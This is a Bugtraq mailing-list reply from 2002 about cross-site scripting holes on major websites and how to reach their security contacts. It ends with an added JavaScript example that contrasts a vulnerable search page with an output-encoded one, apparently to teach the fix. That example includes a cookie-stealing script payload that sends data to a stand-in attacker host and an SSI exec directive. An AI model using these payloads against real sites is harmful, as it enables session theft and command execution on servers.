Re: Cross-site scripting.
From: zeno <bugtraq () cgisecurity net>
Date: Tue, 26 Mar 2002 08:34:21 -0500 (EST)
> I have recently done a "CSS marathon" and found _almost_ every page I tried
> vulnerable within half an hour. These include microsoft, altavista,
> google, cnet, time, ebay, amazon, netscape, yahoo and redhat. This list
> probably could have gone on forever if I had taken the time. I have
> contacted every one of them about this (except for yahoo and ebay because I
> was unable to find a contact email address or feedback form; if it takes
> longer to find the contact info than to find the CSS, f#ck 'em). I am now
> awaiting their responses.
Ebay can be reached at clalonde () ebay com. I had spoken with him in regards to an old
CSS hole and he was very prompt in response once I actually found it. Dunno about yahoo
on the other hand.
Time.com's security contact can be reached at Renee_Guttmann () timeinc com. I had found a hole
that not only allowed CSS but also SSI tag insertion into the website search engine.
Of course it's fixed now, but it took over a month to get fixed. And yes, command execution
was possible. Try emailing lists like incidents and say "security contact for website.com?"
and you will usually get a quick response, which was the case with time and me.
> Feedback on the usefulness (or futility) of a "general CSS advisory" would
Well, as it is generally known, CSS holes can allow potential cookie theft. I guess on larger
sites this may be more of an issue because people invest in them. Small sites you probably
should just email the admins (if you can find them) and if not, contact their ISP: "hey, I wanted to
possibly speak with the admin of this site, can you help me by giving me an email addy?". Originally
when I contacted ebay it took over 3 months to get a response. Once I did, the problem was fixed within
a day. Depending on the site's general security it could perhaps open up some other issues.
- zeno () cgisecurity com
PS: to the people whose email addies I gave out, if you're upset I did please let me know; after all,
giving them out is for your benefit.
> By opening a specially crafted URL in the targeted user's web browser (for
> instance when he visits your website or reads an email you sent him).
> - read anything that user can read from the CSS-vulnerable site.
> (addressbook, personal info, etc...)
> - do whatever that user can do on the CSS-vulnerable site (send messages,
> order stuff, change personal settings and passwords)
> - spoof the contents of the CSS-vulnerable site (make somebody think he is
> looking at www.foo.com while the contents of the page actually comes from
> your site www.bar.com)
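Added example, not code from either post in this thread nor from any of the sites named in it: a site search handler that echoes the query into the results page (the class of hole described above, including the SSI-tag-insertion variant), beside the same handler with its output entity-encoded. The hostname, endpoint, page skeleton, payloads and the crude "active content" check are all assumptions made for illustration. It also shows why one output-encoding fix closes both cases: an SSI directive begins with `<!--#`, so once `<` is encoded before the page reaches an SSI-enabled server there is nothing left for mod_include to execute.

```javascript
// Added example for the reflected-CSS / SSI-injection class of bug discussed
// in this thread. Not code from the original posts or from any site named in
// them; the hostname, endpoint, page skeleton and payloads are assumptions.

// Entity-encode text that will be placed inside an HTML element body.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable search page: the query string is echoed into the markup verbatim.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1><p>0 hits</p></body></html>`;
}

// Hardened search page: identical markup, query entity-encoded on output.
function renderSearchHardened(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1><p>0 hits</p></body></html>`;
}

// Server side of "open a specially crafted URL": pull ?q= out of the request
// URL (percent-decoding it, as any web server or CGI library would) and hand
// it to the page renderer.
function handleRequest(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get('q') || '';
  return render(q);
}

// Attacker side: build the link the victim is lured into opening.
function buildAttackUrl(base, payload) {
  return `${base}?q=${encodeURIComponent(payload)}`;
}

// Crude detector, used only to show the difference between the two renderers:
// does the response carry a script element, or an SSI directive that an
// SSI-enabled server (e.g. Apache mod_include) would execute if this output
// were passed through it?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /<!--#\s*(exec|include|echo)\b/i.test(html);
}

// Constructed payloads (assumptions, not taken from the thread): cookie theft
// via an image beacon, and an SSI exec directive.
const XSS_PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>';
const SSI_PAYLOAD = '<!--#exec cmd="id" -->';
const SEARCH_ENDPOINT = 'http://www.example.com/search'; // assumed endpoint

// Run both payloads through both renderers. Returns, for each renderer, one
// boolean per payload: did the response contain active content?
function demo() {
  const payloads = [XSS_PAYLOAD, SSI_PAYLOAD];
  const check = (render) => payloads.map((p) =>
    containsActiveContent(handleRequest(buildAttackUrl(SEARCH_ENDPOINT, p), render)));
  return { vulnerable: check(renderSearchVulnerable), hardened: check(renderSearchHardened) };
}

console.log(demo()); // vulnerable: [true, true], hardened: [false, false]
```

Encoding on output is the fix; encoding on input would break legitimate searches for terms containing these characters and would have to be repeated for every place the value is later reused. The detector above is deliberately simplistic and is not a scanner: it only illustrates that the encoded page carries no tag for either a browser or an SSI parser to act on.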
- Cross-site scripting. Berend-Jan Wever (Mar 26)
- Re: Cross-site scripting. zeno (Mar 26)